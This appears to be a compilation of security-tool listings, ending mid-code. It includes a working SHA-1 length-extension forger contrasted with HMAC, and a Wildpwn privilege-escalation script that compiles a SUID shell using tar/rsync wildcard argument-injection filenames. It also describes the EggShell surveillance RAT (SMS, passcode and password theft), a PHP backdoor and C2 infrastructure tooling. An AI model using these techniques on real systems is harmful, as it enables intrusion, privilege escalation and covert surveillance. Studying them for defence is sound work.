    A tuple containing the new hex digest and the new message.
    >>> hashpumpy.hashpump('ffffffff', 'original_data', 'data_to_add', len('KEYKEYKEY'))
    ('e3c4a05f', 'original_datadata_to_add')

    Python 3 note
    hashpumpy supports Python 3. Different from the Python 2 version, the second value (the new message) in the returned tuple from hashpumpy.hashpump is a bytes-like object instead of a string.
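Added example (not HashPump's or hashpumpy's own code): a pure-Python SHA-1 whose state can be resumed from a published digest, the same extension hashpump performs for the sample output above, and the two server-side checks a defender should compare: sha1(key||msg), which accepts the forgery, and HMAC-SHA1, which rejects it. The 14-byte key is constructed; only its length (-k 14) is assumed known, and the message and appended data are the ones from the sample output.

```python
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF
SHA1_IV = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476, 0xC3D2E1F0)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def sha1_compress(state, block):
    """One SHA-1 compression over a 64-byte block (FIPS 180-4)."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 80):
        w.append(_rotl(w[i - 3] ^ w[i - 8] ^ w[i - 14] ^ w[i - 16], 1))
    a, b, c, d, e = state
    for i in range(80):
        if i < 20:
            f, k = (b & c) | ((~b & MASK32) & d), 0x5A827999
        elif i < 40:
            f, k = b ^ c ^ d, 0x6ED9EBA1
        elif i < 60:
            f, k = (b & c) | (b & d) | (c & d), 0x8F1BBCDC
        else:
            f, k = b ^ c ^ d, 0xCA62C1D6
        t = (_rotl(a, 5) + f + e + k + w[i]) & MASK32
        a, b, c, d, e = t, a, _rotl(b, 30), c, d
    return tuple((s + v) & MASK32 for s, v in zip(state, (a, b, c, d, e)))


def md_padding(msg_len):
    """Merkle-Damgard padding for msg_len bytes: 0x80, zeros up to 56 mod 64,
    then the 64-bit big-endian bit length.  This is the 'glue' in the sample output."""
    return b"\x80" + b"\x00" * ((55 - msg_len) % 64) + struct.pack(">Q", msg_len * 8)


def sha1_digest(data, state=SHA1_IV, absorbed=0):
    """Hash `data` starting from `state`, which must already have absorbed
    `absorbed` bytes (a multiple of 64).  With the defaults this is plain SHA-1."""
    padded = data + md_padding(absorbed + len(data))
    for i in range(0, len(padded), 64):
        state = sha1_compress(state, padded[i:i + 64])
    return struct.pack(">5I", *state).hex()


def length_extend(hexdigest, original_data, data_to_add, key_length):
    """Same contract as hashpumpy.hashpump(): from sha1(key||original_data) and
    len(key) alone, return (digest, message) with digest == sha1(key||message).
    The digest IS the internal state after key||original_data||glue, so hashing
    simply continues from it; the key itself is never needed."""
    state = struct.unpack(">5I", bytes.fromhex(hexdigest))
    glue = md_padding(key_length + len(original_data))
    forged_msg = original_data + glue + data_to_add
    absorbed = key_length + len(original_data) + len(glue)  # multiple of 64
    return sha1_digest(data_to_add, state, absorbed), forged_msg


# ---- the two server-side checks a defender should compare ------------------
def naive_verify(key, message, hexdigest):
    """sha1(key||message): the construction HashPump defeats."""
    return hmac.compare_digest(hashlib.sha1(key + message).hexdigest(), hexdigest)


def hmac_verify(key, message, hexdigest):
    """HMAC-SHA1 nests two keyed hashes, so extending the outer one is useless."""
    return hmac.compare_digest(hmac.new(key, message, hashlib.sha1).hexdigest(), hexdigest)


def demo():
    key = b"k" * 14  # constructed secret: the attacker learns only its length (-k 14)
    data = b"count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo"
    add = b"&waffle=liege"

    # Vulnerable scheme: extend the published sha1(key||data) tag.
    tag = hashlib.sha1(key + data).hexdigest()
    forged_tag, forged_msg = length_extend(tag, data, add, len(key))

    # Hardened scheme: the same procedure applied to an HMAC tag yields garbage.
    hmac_tag = hmac.new(key, data, hashlib.sha1).hexdigest()
    forged_hmac, _ = length_extend(hmac_tag, data, add, len(key))

    return {
        "forged_msg": forged_msg,
        "naive_accepts_forgery": naive_verify(key, forged_msg, forged_tag),
        "hmac_accepts_forgery": hmac_verify(key, forged_msg, forged_hmac),
    }


if __name__ == "__main__":
    r = demo()
    print(r["forged_msg"])
    print("sha1(key||msg) accepts forgery:", r["naive_accepts_forgery"])
    print("HMAC-SHA1 accepts forgery:     ", r["hmac_accepts_forgery"])
```

The forged message it prints is byte-for-byte the one in the sample output (data, \x80, 56 zero bytes, \x02( as the 552-bit length, then &waffle=liege), which is why the glue depends only on the key length and not on the key.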


    Wildpwn - Unix Wildcard Attack Tool


    Wildpwn is a Python UNIX wildcard attack tool that helps you generate attacks, based on a paper by Leon Juranic. It’s considered a fairly old-skool attack vector, but it still works quite often.

    First things first!
    Read: https://www.exploit-db.com/papers/33930/

    Basic usage
    It goes something like this:
    usage: wildpwn.py [-h] [--file FILE] payload folder

    Tool to generate unix wildcard attacks

    positional arguments:
    payload Payload to use: (combined | tar | rsync)
    folder Where to write the payloads

    optional arguments:
    -h, --help show this help message and exit
    --file FILE Path to file for taking ownership / change permissions. Use it
    with combined attack only.

    Payload types
    • combined: Uses the chown & chmod file reference tricks, described in section 4.1 and 4.2, combined in a single payload.
    • tar: Uses the Tar arbitrary command execution trick, described in section 4.3.
    • rsync: Uses the Rsync arbitrary command execution trick, described in section 4.4.

    Usage example
    $ ls -lh /tmp/very_secret_file
    -rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

    $ ls -lh ./pwn_me/
    drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
    [...]
    -rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_1
    -rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_2
    [...]

    $ python wildpwn.py --file /tmp/very_secret_file combined ./pwn_me/
    [!] Selected payload: combined
    [+] Done! Now wait for something like: chown uid:gid * (or) chmod [perms] * on ./pwn_me/. Good luck!

    [...time passes / some cron gets executed...]

    # chmod 000 * (for example)

    [...back with the unprivileged user...]

    $ ls -lha ./pwn_me/
    [...]
    -rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_1
    -rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_2
    [...]

    $ ls -lha /tmp/very_secret_file
    -rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

    Bash scripts used on tar/rsync attacks
    #!/bin/sh

    # get current user uid / gid
    CURR_UID="$(id -u)"
    CURR_GID="$(id -g)"

    # save file (unquoted heredoc: $CURR_UID and $CURR_GID are expanded here)
    cat > .cachefile.c << EOF
    #include <stdio.h>
    #include <unistd.h>
    int main()
    {
    setuid($CURR_UID);
    setgid($CURR_GID);
    execl("/bin/bash", "-bash", NULL);
    return 0;
    }
    EOF

    # make folder where the payload will be saved
    mkdir .cache
    chmod 755 .cache

    # compile & give SUID
    gcc -w .cachefile.c -o .cache/.cachefile
    chmod 4755 .cache/.cachefile

    Clean up (tar)
    # clean up
    rm -rf ./'--checkpoint=1'
    rm -rf ./'--checkpoint-action=exec=sh .webscript'
    rm -rf .webscript
    rm -rf .cachefile.c

    Clean up (rsync)
    # clean up
    rm -rf ./'-e sh .syncscript'
    rm -rf .syncscript
    rm -rf .cachefile.c


    Phishing-Frenzy - Ruby On Rails Phishing Framework


    Phishing Frenzy is an Open Source Ruby on Rails application that is leveraged by penetration testers to manage email phishing campaigns.

    The project was started in 2013 by the founder Brandon "zeknox" McCann. Brandon identified inefficiencies in the way that many penetration testers were conducting email phishing engagements. Wanting to make it easier to manage phishing campaigns Brandon started the "Phishing Frenzy" project.

    The goal of the project is to streamline the phishing process while still providing clients the best realistic phishing campaign possible. This goal is obtainable through campaign management, template reuse, statistical generation, and other features the Frenzy has to offer.

    Documentation & Info
    Relevant, up-to-date documentation can be found on the official Phishing Frenzy website located below.


    Droidefense - Advance Android Malware Analysis Framework


    Droidefense (originally named atom: analysis through observation machine) is the codename for an Android app/malware analysis and reversing tool. It was built with a focus on the security issues and tricks that malware researchers run into in their everyday work. For samples where the malware has anti-analysis routines, Droidefense attempts to bypass them in order to reach the code and the 'bad boy' routine. Those techniques include virtual machine detection, emulator detection, self certificate checking, pipe detection, tracer pid checks, and so on.
    Droidefense uses an innovative approach in which the code is not decompiled but viewed directly. This gives us a global view of the execution workflow of the code with 100% accuracy on the gathered information. From that, Droidefense generates a fancy HTML report with the results for easy understanding.

    Usage

    TL;DR
    java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

    Detailed usage
    java -jar droidefense-cli-1.0-SNAPSHOT.jar



    * Current build: 2017_12_05__12_07_01
    * Check out on Github: https://github.com/droidefense/
    * Report your issue: https://github.com/droidefense/engine/issues
    * Lead developer: @zerjioang

    usage: droidefense
    -d,--debug print debugging information
    -h,--help print this message
    -i,--input <apk> input .apk to be analyzed
    -o,--output <format> select prefered output:
    json
    json.min
    html
    -p,--profile Wait for JVM profiler
    -s,--show show generated report after scan
    -u,--unpacker <unpacker> select prefered unpacker:
    zip
    memapktool
    -v,--verbose be verbose
    -V,--version show current version information

    Useful info

    pwned - A command-line tool for querying the 'Have I been pwned?' service


    A command-line tool for querying Troy Hunt's Have I been pwned? service using the hibp Node.js module.

    Installation
    npm install pwned -g

    Usage
    Usage: pwned [option | command]


    Commands:

    ba [options] <account> get all breaches for an account (username or email address)
    breaches [options] get all breaches in the system
    breach [options] <name> get a single breached site by breach name
    dc [options] get all data classes in the system
    pa [options] <email> get all pastes for an account (email address)

    Each command has its own -h (--help) option.

    Options:

    -h, --help output usage information
    -v, --version output the version number

    Examples
    Get all breaches for an account:
    $ pwned ba pleasebeclean@fingerscrossed.tld
    Good news — no pwnage found!
    Get all breaches in the system, filtering results to just the 'adobe.com' domain:
    $ pwned breaches -d adobe.com
    -
    Title: Adobe
    Name: Adobe
    Domain: adobe.com
    BreachDate: 2013-10-04
    AddedDate: 2013-12-04T00:00:00Z
    PwnCount: 152445165
    Description: In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, <em>encrypted</em> password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe-top100.txt" target="_blank">many were quickly resolved back to plain text</a>. The unencrypted hints also <a href="http://www.troyhunt.com/2013/11/adobe-credentials-and-serious.html" target="_blank">disclosed much about the passwords</a> adding further to the risk that hundreds of millions of Adobe customers already faced.
    DataClasses:
    - Email addresses
    - Password hints
    - Passwords
    - Usernames
    IsVerified: true
    IsSensitive: false
    IsActive: true
    IsRetired: false
    LogoType: svg
    Get a single breached site by breach name:
    $ pwned breach MyCompany
    No breach found by that name.
    Get all the data classes in the system, returning raw JSON results for external/chained consumption:
    $ pwned dc --raw
    ["Account balances","Age groups","Astrological signs","Avatars","Bank account numbers","Banking PINs","Beauty ratings","Biometric data","Car ownership statuses","Career levels","Chat logs","Credit cards","Customer feedback","Customer interactions","Dates of birth","Device information","Device usage tracking data","Drinking habits","Drug habits","Education levels","Email addresses","Email messages","Employers","Ethnicities","Family members' names","Family plans","Financial transactions","Fitness levels","Genders","Geographic locations","Government issued IDs","Historical passwords","Home ownership statuses","Homepage URLs","Income levels","Instant messenger identities","IP addresses","Job titles","MAC addresses","Marital statuses","Names","Nicknames","Parenting plans","Partial credit card data","Passport numbers","Password hints","Passwords","Payment histories","Personal descriptions","Personal interests","Phone numbers","Physical addresses","Physical attributes","Political views","Private messages","Purchases","Races","Recovery email addresses","Relationship statuses","Religions","Reward program balances","Salutations","Security questions and answers","Sexual fetishes","Sexual orientations","Smoking habits","SMS messages","Social connections","Spoken languages","Time zones","Travel habits","User agent details","User statuses","User website URLs","Usernames","Website activity","Work habits","Years of birth"]
    Get all pastes for an email address:
    $ pwned pa nobody@nowhere.com
    -
    Source: Pastebin
    Id: xyb8vavK
    Title: null
    Date: 2015-06-01T00:16:46Z
    EmailCount: 8
    -
    Source: Pastebin
    Id: DaaFj8Be
    Title: CrackingCore - Redder04
    Date: 2015-04-05T22:22:39Z
    EmailCount: 116
    -
    Source: Pastebin
    Id: 9MAAgecd
    Title: IPTV Yabancı Combolist
    Date: 2015-02-07T15:21:00Z
    EmailCount: 244
    -
    Source: Pastebin
    Id: QMx1dPUT
    Title: null
    Date: 2015-02-02T20:45:00Z
    EmailCount: 6607
    -
    Source: Pastebin
    Id: zUFSee4n
    Title: nethingoez
    Date: 2015-01-21T15:13:00Z
    EmailCount: 312
    -
    Source: AdHocUrl
    Id: http://siph0n.in/exploits.php?id=4560
    Title: BuzzMachines.com 40k+
    Date: null
    EmailCount: 36959
    -
    Source: AdHocUrl
    Id: http://siph0n.in/exploits.php?id=4737
    Title: PayPalSucks Database 102k
    Date: null
    EmailCount: 82071

    CyberChef - The Cyber Swiss Army Knife [A Web App For Encryption, Encoding, Compression And Data Analysis]


    The Cyber Swiss Army Knife
    CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.
    The tool is designed to enable both technical and non-technical analysts to manipulate data in complex ways without having to deal with complex tools or algorithms. It was conceived, designed, built and incrementally improved by an analyst in their 10% innovation time over several years. Every effort has been made to structure the code in a readable and extendable format, however it should be noted that the analyst is not a professional developer.

    Live demo
    CyberChef is still under active development. As a result, it shouldn't be considered a finished product. There is still testing and bug fixing to do, new features to be added and additional documentation to write. Please contribute!
    Cryptographic operations in CyberChef should not be relied upon to provide security in any situation. No guarantee is offered for their correctness.


    How it works
    There are four main areas in CyberChef:
    1. The input box in the top right, where you can paste, type or drag the data you want to operate on.
    2. The output box in the bottom right, where the outcome of your processing will be displayed.
    3. The operations list on the far left, where you can find all the operations that CyberChef is capable of in categorised lists, or by searching.
    4. The recipe area in the middle, where you can drag the operations that you want to use and specify arguments and options.
    You can use as many operations as you like in simple or complex ways. Some examples are as follows:

    Features
    • Drag and drop
      • Operations can be dragged in and out of the recipe list, or reorganised.
      • Files can be dragged over the input box to load them directly.
    • Auto Bake
      • Whenever you modify the input or the recipe, CyberChef will automatically “bake” for you and produce the output immediately.
      • This can be turned off and operated manually if it is affecting performance (if the input is very large, for instance).
      • If any bake takes longer than 200 milliseconds, auto bake will be switched off automatically to prevent further performance issues.
    • Breakpoints
      • You can set breakpoints on any operation in your recipe to pause execution before running it.
      • You can also step through the recipe one operation at a time to see what the data looks like at each stage.
    • Save and load recipes
      • If you come up with an awesome recipe that you know you’ll want to use again, just click save and add it to your local storage. It'll be waiting for you next time you visit CyberChef.
      • You can also copy a URL which includes your recipe and input which can be shared with others.
    • Search
      • If you know the name of the operation you want or a word associated with it, start typing it into the search field and any matching operations will immediately be shown.
    • Highlighting
    • Save to file and load from file
      • You can save the output to a file at any time or load a file by dragging and dropping it into the input field (note that files larger than about 500kb may cause your browser to hang or even crash due to the way that browsers handle large amounts of textual data).
    • CyberChef is entirely client-side
      • It should be noted that none of your input or recipe configuration is ever sent to the CyberChef web server - all processing is carried out within your browser, on your own computer.
      • Due to this feature, CyberChef can be compiled into a single HTML file. You can download this file and drop it into a virtual machine, share it with other people, or use it independently on your desktop.

    Browser support
    CyberChef is built to support
    • Google Chrome 40+
    • Mozilla Firefox 35+
    • Microsoft Edge 14+


    4Nonimizer - A Tol For Anonymizing The Public IP Used To Browsing Internet, Managing The Connection To TOR Network And To Different VPNs Providers


    4nonimizer is a bash script for anonymizing the public IP used to browse the Internet, managing the connection to the TOR network and to different VPN providers (OpenVPN), whether free or paid. By default it includes several pre-configured VPN connections to different peers (.ovpn files) and downloads the credentials (if the corresponding provider supports it). It also records, every 300 seconds, each IP we use in log files.
    This script is enabled as a service on systemd systems and uses a default VPN (VPNBook) at system startup.
    Since version 1.06, DNS resolution requests are done through DNSCrypt (enable and disable with the options enable_dns or disable_dns).
    Since version 1.12, VPN connection logs are saved in SQLite under /logs/.

    Attention VPN Providers!
    If you are a provider that supports OpenVPN and want your VPN integrated into 4nonimizer, contact the developers at hackplayers @ ymail.com.

    Installation
    Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the on-screen instructions; 4nonimizer will be moved to /opt/ and installed as a service.
    This script is fully compatible with Kali Linux, where it has been properly tested, and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However, there could be some bugs or unexpected behaviour (please comment if you find any!).

    Options
    Once 4nonimizer is installed, enter the command 4nonimizer help to get the help, which shows all the available parameters:
    By Carlos Antonini & Vicente Motos
    Version: 1.06-beta
    Usage: 4nonymizer <parameter>
         install: Install the script in run services
         uninstall: Disable run service and remove app directory
         change_provider: Change VPN Provider
         change_ip: Change IP from VPN current
         vpn_status: Check IP and provider VPN running
         update_vpns: Update all ovpn of VPNs
         start: Init the 4nonimizer service
         stop: Stop the 4nonimizer service
         stop_nonet: Stop the 4nonimizer service and shutdown network interfaces
         restart: Restart the 4nonimizer service
         update_app: Update this program via git
         privoxy: Install and configure privoxy with port 8118 (BETA)
         proxychains4: Install and configure proxychains4 for default in the system
         browser: Fire up a firefox browser with profile privoxy -> tor
         test_availability: Check peers availability and delete ovpn file if the IP/service is unreachable
         location: Now you can select a specific country or continent of the vpn peer
         enableboot: You can enable service in boot
         disableboot: You can disable service in boot
         enable_dnscrypt: Enable dnscrypt service
         disable_dnscrypt: Disable dnscrypt service
         help: Help (this screen)

    Available VPNs
    Currently it supports the following VPN providers:
    - 7Proxies https://www.7proxies.com/
    - AirVPN https://airvpn.org/
    - Cryptostorm https://cryptostorm.is/
    - Cyberghost https://www.cyberghostvpn.com/en_US/
    - ExpressVPN https://www.expressvpn.com
    - FreeVPN https://freevpn.me/
    - HideMyAss https://www.hidemyass.com/
    - IpPVanish https://www.ipvanish.com/
    - NordVPN https://nordvpn.com
    - PIA https://www.privateinternetaccess.com/
    - ProntonVPN https://protonvpn.com/
    - Proxy.sh https://proxy.sh/
    - SlickVPN https://www.slickvpn.com
    - StrongVPN https://strongvpn.com/
    - TorGuard https://torguard.net/
    - TunnelBear https://www.tunnelbear.com/
    - VPNBook (default) http://www.vpnbook.com/
    - VPNGate http://www.vpngate.net/en/
    - VPNKeys https://www.vpnkeys.com/
    - VPNMe https://www.vpnme.me/
    - Vyprvpn https://www.goldenfrog.com/es/vyprvpn

    Install a new VPN
    To install an additional VPN, the following structure must be used so that 4nonimizer can integrate it and perform operations with it.
    First, create the following directory structure under /vpn/ within the 4nonimizer path:


    In our example we create the folder /vpntest/ and place in it all the .ovpn files we have. If the .ovpn files do not embed their certificate, we put it in the same folder, as shown in the example with certificate.crt.
    In addition, we must place a file named pass.txt containing two lines: the first with the username and the second with the password, as shown below:


    If all steps have been performed correctly, running the command 4nonimizer change_provider will show our VPN in the menu:


    As you can see in the picture, option [7] is the VPN we've created.

    Getting credentials and ovpn files automatically
    If the VPN provider allows automated retrieval of credentials and/or .ovpn files, 4nonimizer has standardized the following script names and locations:
    - /opt/4nonimizer/vpn/provider/vpn-get-pass.sh


    - /opt/4nonimizer/vpn/provider/vpn-get-ovpn.sh


    4nonimizer automatically detects the presence of both scripts and indicates (Auto-pass Login) or (Auto-get OVPN) if it finds the expression '#4uto' or '#m4nual' in the first line of each file, depending on the actions performed.


    Extras
    - Execute 'source 4nonimizer' to activate autocompletion of parameters.
    - Copy .conkyrc to your home directory to load a 4nonimizer template and run conky.

    Videos
    - Install 4nonimizer on Kali Linux https://www.youtube.com/watch?v=FQRuRmMkcDg
    - 4nonimizer: browsing securely over VPN (Kali Linux 2016.2) https://www.youtube.com/watch?v=6GApaN7fSn8
    - Become anonymous on Kali Linux (4nonimizer) https://www.youtube.com/watch?v=Y3puD1Bw3xA
    - Anonymizer - How To Hide Your IP address on Kali Linux 2016.2 (Change IP) https://www.youtube.com/watch?v=MNdQD0DCG0A
    - Become Anonymous on kali linux 2016.2 https://www.youtube.com/watch?v=IFnhm-rrnEg
    - Auto Hide IP with 4nonimizer on KALI Linux 2017 https://www.youtube.com/watch?v=HgqZCm8Wdvw
    - Kali Linux - 4nonimizer | Surf Anonymously https://www.youtube.com/watch?v=_mOUQBv4sWs

    Versions
    Number      Codename        Date
    1.00-beta   bye-world!      5/10/2016
    1.02-beta   evol-time       11/10/2016
    1.03-beta   using-latin-i   17/10/2016
    1.04-beta   locateit        22/12/2016
    1.05-beta   encrypting      03/01/2017
    1.06-beta   1st-trial       18/01/2017
    1.07-beta   noname          03/05/2017
    1.08-beta   falcon          15/08/2017
    1.09-beta   rabbit          09/11/2017
    1.10        fresh_air       27/02/2018
    1.11        shhh            17/05/2018
    1.12        sqliting        18/05/2018
    ¡4nonimize the world!


    Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked


    Leaked? is a checking tool for leaked hash codes, passwords and emails. It uses the leakz module from Aidan Holland, and leakz uses the API from Aurelius Wendelken.
    Leaked? can work on any OS that supports Python 3 or 2.

    What's new?
    • Check email leaked
    • Update
    • More friendly for users
    • Support Python 2 and 3

    Features
    • Check passwords leaked
    • Check hash code leaked
    • Check email leaked NEW!
    • Update NEW!
    • Exit
    • About Author

    Install and Run in Linux
    sudo apt update && sudo apt install python3 python3-pip
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip3 install -r requirements.txt
    pip install -r requirements.txt
    python3 leaked.py
    or python leaked.py

    Install and Run in Windows
    Download and run the Python 3 setup file from Python.org. In the Python 3 installer, enable Add Python 3.7 to PATH and For all users.
    Download and run the Git setup file from Git-scm.com, and choose Use Git from Windows Command Prompt.
    After that, run Command Prompt or PowerShell and enter these commands:
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip install -r requirements.txt
    python leaked.py

    Update Leaked?: git pull -f

    Notes
    Leaked? uses the leakz module from Aidan Holland, and leakz uses the API from Aurelius Wendelken.
    Follow their Twitter accounts!

    Screenshots




    Contact to Author

    EggShell - iOS/macOS/Linux Remote Administration Tool


    EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files, tab completion, taking pictures, location tracking, shell command execution, persistence, escalating privileges, password retrieval, and much more. This project is a proof of concept, intended for use on machines you own.

    For detailed information and how-to visit http://lucasjackson.io/eggshell
    Follow on twitter: @neoneggplant

    New In Version 3.0.0
    • More secure socket connection using SSL
    • Linux support
    • Tab completion
    • Improved overall structure and efficiency of session handling
    • Native iOS python support for 64 bit devices

    Getting Started
    • Requires python 2.7

    macOS/Linux Installation
    git clone https://github.com/neoneggplant/eggshell
    cd eggshell
    python eggshell.py

    iOS (Jailbroken)
    1. Add Cydia source: http://lucasjackson.io/repo
    2. Install EggShell 3
    3. Use any mobile terminal application and run the command eggshell


    Creating Payloads
    Eggshell payloads are executed on the target machine. The payload first sends over instructions for getting and sending back device details to our server and then chooses the appropriate executable to establish a secure remote control session.

    bash
    Selecting bash from the payload menu will give us a one-liner that establishes an EggShell session upon execution on the target machine.



    teensy macOS (USB injection)
    Teensy is a USB development board that can be programmed with the Arduino IDE. It emulates USB keyboard strokes extremely fast and can inject the EggShell payload in just a few seconds.



    Selecting teensy will give us an arduino based payload for the teensy board.



    After uploading to the teensy, we can use the device to plug into a macOS usb port. Once connected to a computer, it will automatically emulate the keystrokes needed to execute a payload.



    Interacting with a session

    After a session is established, we can execute commands on that device through the EggShell command line interface. We can show all the available commands by typing "help"


    Tab Completion
    Similar to most command line interfaces, EggShell supports tab completion. When you start typing the path to a directory or filename, we can complete the rest of the path using the tab key.


    Multihandler
    The Multihandler option lets us handle multiple sessions. We can choose to interact with different devices while listening for new connections in the background.


    Similar to the session interface, we can type "help" to show Multihandler commands


    Commands

    macOS
    • brightness : adjust screen brightness
    • cd : change directory
    • download : download file
    • getfacebook : retrieve facebook session cookies
    • getpaste : get pasteboard contents
    • getvol : get speaker output volume
    • idletime : get the amount of time since the keyboard/cursor were touched
    • imessage : send message through the messages app
    • itunes : iTunes Controller
    • keyboard : your keyboard -> is target's keyboard
    • lazagne : firefox password retrieval | (https://github.com/AlessandroZ/LaZagne/wiki)
    • ls : list contents of a directory
    • mic : record mic
    • persistence : attempts to re establish connection after close
    • picture : take picture through iSight
    • pid : get process id
    • prompt : prompt user to type password
    • screenshot : take screenshot
    • setvol : set output volume
    • sleep : put device into sleep mode
    • su : su login
    • suspend : suspend current session (goes back to login screen)
    • upload : upload file

    iOS
    • alert : make alert show up on device
    • battery : get battery level
    • bundleids : list bundle identifiers
    • cd : change directory
    • dhome : simulate a double home button press
    • dial : dial a phone number
    • download : download file
    • getcontacts : download addressbook
    • getnotes : download notes
    • getpasscode : retrieve the device passcode
    • getsms : download SMS
    • getvol : get volume level
    • home : simulate a home button press
    • installpro : install substrate commands
    • ipod : control music player
    • islocked : check if the device is locked
    • lastapp : get last opened application
    • locate : get device location coordinates
    • locationservice: toggle location services
    • lock : simulate a lock button press
    • ls : list contents of a directory
    • mic : record mic
    • mute : update and view mute status
    • open : open apps
    • openurl : open url on device
    • persistence : attempts to re establish connection after close
    • picture : take picture through iSight
    • pid : get process id
    • respring : restart springboard
    • safemode : put device into safe mode
    • say : text to speech
    • setvol : set device volume
    • sysinfo : view system information
    • upload : upload file
    • vibrate : vibrate device

    Linux
    • cd : change directory
    • download : download file
    • ls : list contents of a directory
    • pid : get process id
    • pwd : show current directory
    • upload : upload file


    Door404 - PHP Backdoor For Web Servers


    Door404 is an open source PHP backdoor for web servers, developed by MrSqar & Rizer.
    This project was developed for two reasons:
    • First: "Help beginners to learn coding."
    • Second: "Help newbie server managers to learn new protection tricks."


    Requirements

    • PHP
    • PHP cURL extension

    OS
    • Linux

    ScreenShots and Video: (embedded screenshots and demo video are not reproduced here)

    hideNsneak - A CLI For Ephemeral Penetration Testing


    This application assists in managing attack infrastructure for penetration testers by providing an interface to rapidly deploy, manage, and take down various cloud services. These include VMs, domain fronting, Cobalt Strike servers, API gateways, and firewalls.

    Black Hat Arsenal Video Demo Video - https://youtu.be/8YTYScLn7pA

    Overview
    hideNsneak provides a simple interface that allows penetration testers to build ephemeral infrastructure -- one that requires minimal overhead. hideNsneak can:
    • deploy, destroy, and list
      1. Cloud instances via EC2 and Digital Ocean (Google Cloud, Azure, and Alibaba Cloud coming soon)
      2. API Gateway (AWS)
      3. Domain fronts via AWS Cloudfront and Google Cloud Functions (Azure CDN coming soon)
    • Proxy through infrastructure
    • Deploy C2 redirectors
    • Send and receive files
    • Port scanning via NMAP
    • Remote installations of Burp Collab, Cobalt Strike, Socat, LetsEncrypt, GoPhish, and SQLMAP
    • work with teams (several operators sharing one Terraform state)

    Running locally
    A few disclosures for V 1.0:
    • At this time, all hosts are assumed Ubuntu 16.04 Linux.
    • Setup is done on your local system (Linux and Mac Only). In the future, we're hoping to add on a docker container to decrease initial setup time
    • The only vps providers currently setup are AWS and Digital Ocean
    • You need to make sure that go is installed. Instructions can be found here
    • the GOPATH environment variable MUST be set
    1. Create a new AWS S3 bucket in us-east-1
      • Ensure this is not public as it will hold your terraform state
    2. go get github.com/rmikehodges/hideNsneak
    3. cd $GOPATH/src/github.com/rmikehodges/hideNsneak
    4. ./setup.sh
    5. cp config/example-config.json config/config.json
      • fill in the values
      • aws_access_id, aws_secret_key, aws_bucket_name, public_key, private_key, ec2_user, and do_user are required at minimum
      • all operators working on the same state must have config values filled in all the same fields
      • private and public keys must be the same for each operator
    6. now you can use the program by running ./hidensneak [command]
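    The config rules in step 5 (the minimum required fields, every operator filling in the same fields, and identical public/private key paths across operators) are the usual cause of a broken shared Terraform state. The following Go program is an added example written for this page, not part of hideNsneak; it assumes config.json is a flat JSON object with the field names listed above (the repository's example-config.json may carry more fields), and it treats aws_bucket_name as a field that must also match between operators, which is an assumption drawn from the bucket holding the shared state rather than something the README states. The two operator configs are constructed sample input, not real credentials.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
)

// Constructed sample configs for two operators sharing one Terraform state.
// Values are placeholders, not real credentials. Bob's config omits do_user
// and points at a different private key, which the checks below must flag.
const AliceConfigJSON = `{
  "aws_access_id":   "EXAMPLE-ALICE-ID",
  "aws_secret_key":  "example-alice-secret",
  "aws_bucket_name": "team-hns-state",
  "public_key":      "~/.ssh/team_hns.pub",
  "private_key":     "~/.ssh/team_hns",
  "ec2_user":        "ubuntu",
  "do_user":         "root"
}`

const BobConfigJSON = `{
  "aws_access_id":   "EXAMPLE-BOB-ID",
  "aws_secret_key":  "example-bob-secret",
  "aws_bucket_name": "team-hns-state",
  "public_key":      "~/.ssh/team_hns.pub",
  "private_key":     "~/.ssh/bob_personal",
  "ec2_user":        "ubuntu"
}`

// requiredFields is the minimum set the README says config.json must carry.
var requiredFields = []string{
	"aws_access_id", "aws_secret_key", "aws_bucket_name",
	"public_key", "private_key", "ec2_user", "do_user",
}

// sharedFields must be identical for every operator on the same state.
// public_key/private_key come from the README; aws_bucket_name is an
// assumption (the bucket holds the shared Terraform state).
var sharedFields = []string{"public_key", "private_key", "aws_bucket_name"}

// Config is a flat config.json; values are kept untyped so a non-string
// field in a real file does not make parsing fail.
type Config map[string]interface{}

// ParseConfig decodes one operator's config.json.
func ParseConfig(raw []byte) (Config, error) {
	var c Config
	if err := json.Unmarshal(raw, &c); err != nil {
		return nil, err
	}
	return c, nil
}

// isBlank treats an absent key, a JSON null and an empty string as "not filled in".
func isBlank(v interface{}) bool {
	switch s := v.(type) {
	case nil:
		return true
	case string:
		return s == ""
	}
	return false
}

// MissingRequired returns the required fields that are absent or empty, sorted.
func MissingRequired(c Config) []string {
	var missing []string
	for _, k := range requiredFields {
		if isBlank(c[k]) {
			missing = append(missing, k)
		}
	}
	sort.Strings(missing)
	return missing
}

// CompareOperators reports shared fields whose values differ between two
// operators, and fields that only one of them has filled in (the README
// requires both sets to be the same). The result is sorted for stable output.
func CompareOperators(a, b Config) []string {
	var problems []string
	for _, k := range sharedFields {
		if fmt.Sprint(a[k]) != fmt.Sprint(b[k]) {
			problems = append(problems, "shared field differs: "+k)
		}
	}
	for k := range a {
		if _, ok := b[k]; !ok {
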